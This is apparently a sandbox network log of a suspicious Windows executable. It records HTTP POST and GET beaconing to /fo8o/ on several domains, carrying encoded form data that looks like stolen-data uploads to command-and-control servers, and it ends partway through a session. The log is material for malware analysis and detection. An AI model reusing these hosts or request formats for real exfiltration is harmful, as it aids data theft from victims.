                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:57:57.674516916 CET814OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 62 79 55 33 34 70 46 38 44 47 4e 6b 77 72 32 43 4d 4b 38 45 31 41 34 37 34 36 67 70 45 6a 72 56 55 3d
                                                                            Data Ascii: zh=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyU34pF8DGNkwr2CMK8E1A4746gpEjrVU=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1149838116.50.37.244803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:58:00.331348896 CET1827OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 48 47 38 7a 4d 2f 75 4c 57 32 35 65 38 33 59 76 75 7a 46 41 38 70 6f 79 36 61 70 35 31 67 37 47 6b 34 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 64 49 78 6b 64 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a 78 [TRUNCATED]
                                                                            Data Ascii: zh=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnHG8zM/uLW25e83YvuzFA8poy6ap51g7Gk4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZdIxkdfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpMYBMWcky02DneIJBpTzAmuJOAz5QXmbpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUhYLUIy6fLP8iYfrnTUW0LSocQQjipnC0WvC+qSq9UVMiDhBD752zisyPxjgCYVpU4vit/jihlIuAKAdDu7mWpC+gbIbINmRdtk41h4oclAMbxlNnnaHftmGNuCNwDdKC5sB1gl2vU4K6s91Z8fv4utAGt4pOjM7F0Viocf+bG41Kahiohy1mG7c6AYoxeUFLYtJBxw1PdR9c9j/q3g03YHK6YpS8sj4vBMQupa+fUtHvDt8EQkQragXZpgRHFfxG2yPCP6Oz4xU72X3yyxSk4TaxsupqvMvtMk56SZLA4KS5viPeI3ukdW72sREt1ukWYVAqi3JoMHg/qqzQv6n7+TA8VFCRAgXPFmCkH4c/NhxQBsQCETt4Qh/BDGYgY5Ab1lkuAD+KPGr1SaeEgmgi6CcZMLIBwoGzIWkViCqshdND+Ct6YcjY2kPO9mihC5sUoMK2IP/f8J4vz0E35RhbK4Wxqb0Z+q+uGXHNJTkN9UrNxITrcSTq4cOhpA5QpFR/tuTPZIylTxVDyx4 [TRUNCATED]
                                                                            Nov 25, 2024 13:58:01.899795055 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Mon, 25 Nov 2024 12:58:01 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1149844116.50.37.244803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:58:03.039386988 CET514OUTGET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.goldenjade-travel.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 13:58:04.614001036 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Mon, 25 Nov 2024 12:58:04 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.114988085.159.66.93803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:58:18.842212915 CET773OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 31 32 44 45 63 4c 46 49 4e 79 75 75 52 42 67 2b 61 39 5a 5a 74 71 37 63 54 53 53 41 48 58 4c 67 73 77 3d 3d
                                                                            Data Ascii: zh=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12DEcLFINyuuRBg+a9ZZtq7cTSSAHXLgsw==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.114988685.159.66.93803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:58:21.487127066 CET793OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 7a 65 48 30 7a 77 4f 6d 75 70 33 31 34 55 71 54 34 6a 79 43 75 7a 6d 56 36 4b 2b 6f 68 44 4d 49 4d 3d
                                                                            Data Ascii: zh=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeH0zwOmup314UqT4jyCuzmV6K+ohDMIM=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.114989285.159.66.93803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:58:24.193815947 CET1806OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 51 55 37 2b 54 57 4b 46 33 48 63 2b 76 79 6b 31 69 48 2b 48 36 47 4c 46 69 4a 4a 63 66 73 72 2b 61 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 4d 4f 73 39 47 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c 2b [TRUNCATED]
                                                                            Data Ascii: zh=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpQU7+TWKF3Hc+vyk1iH+H6GLFiJJcfsr+aUYwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JMOs9GQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRrSPONduHl5ua2VubEsxTtqVVH0/4C93V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSsh3qQ/+zYWCggo0HSgiKCGAK3NodetOURwV1Y224AoreqXUxyDj2JA5VDFUgsp4A5JscT8SWC4+biRmOZlg90J4zHkuZGCDX/OgbL0HKZn+KCvfyiWDbtQv9gp8Jju7TYaJ8HofdF2QLrpPrL/Fe2SuzB9o46MSwPjGa2uk4PtUJiUmEDqFnt/WcVEX5W4NWWW+fqznG4V2cpTncJnuVkZqIUAW0kcV/x11C5BnIK285v2Ir8CiIXtQAG0ZGDO7oFuOr9rhjeM6mR+oq6dmtr9+xpx8+2STcErHIpzgX/Ymo8XfCMuxasxpCVIo1rQ143JpeS4mEcGOSvP2m23pdUKGAckPZwegIbpHpBCRxBs4pcXGW5AuNPs8tRkDTNdYWS7kbToUJVRTJfSsVJeSHKy2DKJJw50U05j8bczUr/6Da+4uG6mYo1E8px+qFDnEDEz47AZulJO5nkTG0PhCLqHBkghAaecpadgpcHbUgbJZebV+X6KnYAN9pWt2WViVWO4kag3k2Rc8FwcZt [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.114989985.159.66.93803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:58:26.848601103 CET507OUTGET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.magmadokum.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 13:59:28.290719986 CET194INHTTP/1.0 504 Gateway Time-out
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.114998491.195.240.94803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:59:33.946837902 CET776OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 39 46 61 74 63 44 39 67 59 42 79 74 58 32 73 78 69 75 46 53 37 77 7a 77 5a 4a 63 54 72 68 51 67 3d 3d
                                                                            Data Ascii: zh=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o99FatcD9gYBytX2sxiuFS7wzwZJcTrhQg==
                                                                            Nov 25, 2024 13:59:35.222839117 CET707INHTTP/1.1 405 Not Allowed
                                                                            date: Mon, 25 Nov 2024 12:59:35 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.114998591.195.240.94803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:59:36.616699934 CET796OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.rssnewscast.com/fo8o/
